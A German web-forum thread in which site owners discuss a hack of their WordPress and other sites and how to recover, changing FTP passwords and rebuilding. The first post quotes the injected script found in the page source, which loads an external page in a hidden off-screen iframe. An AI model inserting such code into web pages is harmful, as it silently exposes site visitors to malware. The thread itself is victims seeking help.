Problem mit Wordpress

[swiat]

Hallo,

habe ein Problem mit meinem AVZ:

www.artikelschleuder.de

Gestern funktionierten noch alle Unterseiten, Tagseiten und auch die Artikelseiten, seit heute geht keine Unterseite mehr.

Seit einigen Tagen gibt es eine neue Version von Wordpress, eben ein Update gemacht, Unterseiten funktionieren nicht.

Habe im Quelltext das gefunden:

<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'https://fontana-euronics.com/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script>

Der Shop in dem Script war plötzlich an Stelle des Zugangs zum Admin da, bei einem weiteren Versuch ging der Login.

Was kann hier das Problem sein?

Wie kann man dieses Script entfernen?

Gruss

[swiat]

Das Script befindet sich noch auf zwei anderen Seiten (Kein Wordpress).

[MonikaTS]

1. hast du die Permalinks erneuert ?

2. Passwörter zu FTP +Domainverwaltung ändern, gleich, nicht erst Morgen


+++++++++++
3. sind alle Domains auf dem selben FTP?

4, wenn das alles so ist => gehackt , aus Maus, alles jungfräulich frisch machen , wenn du bei WP damit Probleme hast oder nicht weißt wie es bis ins kleinste Tüpfelchen geht, kannst mich ruhig via PN kontaktieren,

[swiat]

1. hast du die Permalinks erneuert ?

2. Passwörter zu FTP +Domainverwaltung ändern, gleich, nicht erst Morgen


+++++++++++
3. sind alle Domains auf dem selben FTP?

4, wenn das alles so ist => gehackt , aus Maus, alles jungfräulich frisch machen , wenn du bei WP damit Probleme hast oder nicht weißt wie es bis ins kleinste Tüpfelchen geht, kannst mich ruhig via PN kontaktieren,

Permalinks nicht geändert.

Werde gleich das FTP Pw ändern, ja auf diesem Webspace haben alle Domains den gleichen FTP Zugang.

Trifft wohl Punkt 4



Danke für deine Info.

Gruss

[ThatsLife]

Kannst du mal eine Auflistung deiner Plugins und Theme(s) machen?

[weltweit]

Fast alle unsere Blogs sind heute ebenfalls gehackt - der Code ist der gleiche wie oben schon gepostet.

Hat schon jemand etwas herausgefunden?

Das sind unsere Plugins:
Akismet
cbnet Ping Optimizer
Fixed Size of Uploaded Images & No Thumbnails
Get Recent Comments
Sociable Zyblog Edition
Target Blank In Posts And Comments
the_excerpt Reloaded

[weltweit]

und - keine hat eine Idee zur Vermeidung in Zukunft oder Lösungsansätze?

Wir können uns immer noch nicht ganz erklären, wie es dazu kommen konnte.
Es wurden viele unserer Blogs und Seiten gehackt, was auf einen keylogger oder etwas ähnliches hindeutet, daß FTP-Passwörter ermittelt (wir arbeiten mit filezilla).

ABER was dagegen spricht: es sind eben nicht alle unsere Seiten und Blogs betroffen. Vor Jahren hatten wir schon mal so einen Keylogger und damals waren wirklich ALLE Seiten betroffen.

Momentan sind wir dabei, alle FTP-Passwörter zu ändern und die Daten neu hochzuladen, jedoch würden wir den ganzen Vorgang gerne auch besser verstehen, um in Zukunft sowas zu verhindern.

Es kann auch nicht an einer veralteten Wordpress-Version gelegen haben, denn auch unser ganz neuen Blog mit neuester Version ist betroffen.

[swiat]

Ich denke Wordpress ist generell ziemlich gefährdet einem Hacker zum Opfer zu fallen, auch wenn öfter neue Updates eingespielt werden.

Hier meine Plugins:

Adminimize
Akismet (deaktiviert)
All in One SEO Pack
Antispam
Draft Notifier
Google XML Sitemaps
Hello Dolly
Nofollow Case by Case
Register Plus
WP-PostRatings
WP-PostViews
WP-Stats
WP-UserOnline
WP Pending Post Notifier Plus
WP Permalauts

Das Script wurde unter anderem in einer htaccess hinterlegt, bzw mit hinzugefügt.

Gruss

[MonikaTS]

nee WP ist nicht hacker anfälliger als andere

immerhin verwenden mehr als 50% aller Websites, die ein CMS verwenden WP

meist liegt der Grund eines Hackangriffs an leicht erfassbaren Passwörtern, das schreib ich nicht so gern ist aber so


wäre nur WP gehackt gewesen, dann hätt es deine anderen Seiten nicht erwischt, es wurde der ftp gehackt,

nur wer die Lücke richtig erkennt, kann sie gut genug sichern,

[swiat]

wäre nur WP gehackt gewesen, dann hätt es deine anderen Seiten nicht erwischt, es wurde der ftp gehackt,

nur wer die Lücke richtig erkennt, kann sie gut genug sichern,

Hab jetzt das Pw für FTP abgeändert.

Könnte der Hack mit einer alten Version von Filezilla zusammen hängen?

Ich bin immer etwas faul mit den ganzen Updates.....

Gruss

[ThatsLife]

Hast du deinen Rechner schon komplett durchgecheckt?

[Vegas]

Das Problem mit Filezilla ist, daß eine Art History im Klartext gespeichert wird, solange man es in Standardeinstellung betreibt. Liest irgendwelche Malware die ungeschützte Datei aus, hast Du den Salat.

[jabbadu]

Ja Filezilla ist sehr anfällig..

Man kann die ganzen Servereinstellungen auch einfach per XML exportieren, da werden dann die PW und Zugänge schön säuberlich abgelichtet..
Aber an einer alten Version kann es eigentlich nicht liegen.

[CubeMaster]

Ja Filezilla ist sehr anfällig..

Man kann die ganzen Servereinstellungen auch einfach per XML exportieren, da werden dann die PW und Zugänge schön säuberlich abgelichtet..
Aber an einer alten Version kann es eigentlich nicht liegen.

Darf ich fragen, wie du das mit Filezilla und den Zugangsdaten genau machst? Ich habe in den Einstellungen nämlich nur angkreuzt "Passwörter nicht speichern"

[swiat]

Hab die Seite jetzt in der Nacht neu eingerichtet, funktioniert wieder.

Alle Artikel wieder online.

Hast du deinen Rechner schon komplett durchgecheckt?

Werde ich noch machen.

Internet läuft bei mir fast nur über dieses Tool:

www.sandboxie.com

Trotzdem kann natürlich was drauf sein.

Gruss